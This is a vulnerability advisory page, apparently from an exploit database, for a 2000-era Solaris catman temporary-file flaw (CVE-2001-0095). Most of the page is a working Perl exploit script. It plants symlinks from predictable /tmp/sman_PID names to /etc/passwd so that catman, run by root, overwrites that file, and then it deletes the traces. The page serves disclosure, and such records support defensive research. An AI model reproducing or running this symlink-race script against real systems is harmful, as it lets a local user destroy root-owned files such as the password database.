Solaris 2.7/2.8 catman Temp File Vulnerability

Risk: Medium
Local: Yes
Remote: No
CWE: CWE-Other

CVSS Base Score: 1.2/10
Impact Subscore: 2.9/10
Exploitability Subscore: 1.9/10
Exploit range: Local
Attack complexity: High
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Title: Solaris 2.7/2.8 catman Temp File Vulnerability Author: Larry W. Cashdollar, @_larry0 Date: 2000-12-18 CVE-ID:[CVE-2001-0095] Download Site: Vendor: Oracle Systems Vendor Notified: 2000-11-23 Vendor Contact: Advisory: Description: Through the use of symlinking temporary files created by /usr/bin/catman upon execution by root a local user can clobber root owned files. Vulnerability: The catman command creates preformatted versions of the online manual. It also creates the windex database for utilities like apropos and whatis. The problem lies with catman creating a temporary file in /tmp, the file has the form of /tmp/sman_pidofcatman. An attacker can monitor the process list for the execution of catman and create a symlink to a root owned file. catman will upon execution overwrite the contents of that file. This is a new bug for catman and is not addressed in the current patch cluster for Solaris 2.7 Sparc. Export: JSON TEXT XML Exploit Code: #!/usr/local/bin/perl -w # The problem is catman creates files in /tmp insecurly. They are based on the # PID of the catman process, catman will happily clobber any files that are # symlinked to that file. # The idea of this script is to create a block of symlinks to the target file # with the current PID as a starting point. Depending on what load your # system has this creates 1000 files in /tmp as sman_$currentpid + 1000. # The drawback is you would have to know around when root would be executing # catman. # A better solution would be to monitor for the catman process and create the # link before catman creates the file. I think this is a really small window # however. This worked on a patched Solaris 2.7 box (August 2000 patch # cluster) # SunOS rootabega 5.7 Generic_106541-12 sun4u sparc SUNW,Ultra-1 # 11/21/2000 Vapid Labs. # $clobber = "/etc/passwd"; #file to clobber $X=getpgrp(); $Xc=$X; #Constant $Y=$X+1000; #Constant while($X < $Y) { print "Linking /tmp/sman_$X to $clobber :"; # Change $clobber to what you want to clobber. if (symlink ($clobber, "/tmp/sman_$X")) { print "Sucess\n"; } else { print "failed, Busy system?\n"; } $X=$X+1; } #Watch /tmp and see if catman is executed in time. while(1) { $list = "/usr/bin/ls -l /tmp | grep sman|grep root |"; open (list,$list) or "die cant open ls...\n"; while() { @args = split "_",$_; chop ($args[1]); if ($args[1] >= $Xc && $args[1] <= $Y) { print "Looks like pid $args[1] is the winner\n cleaning....\n"; `/usr/bin/rm -f /tmp/sman*`; exit(1); } } }


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018,


Back to Top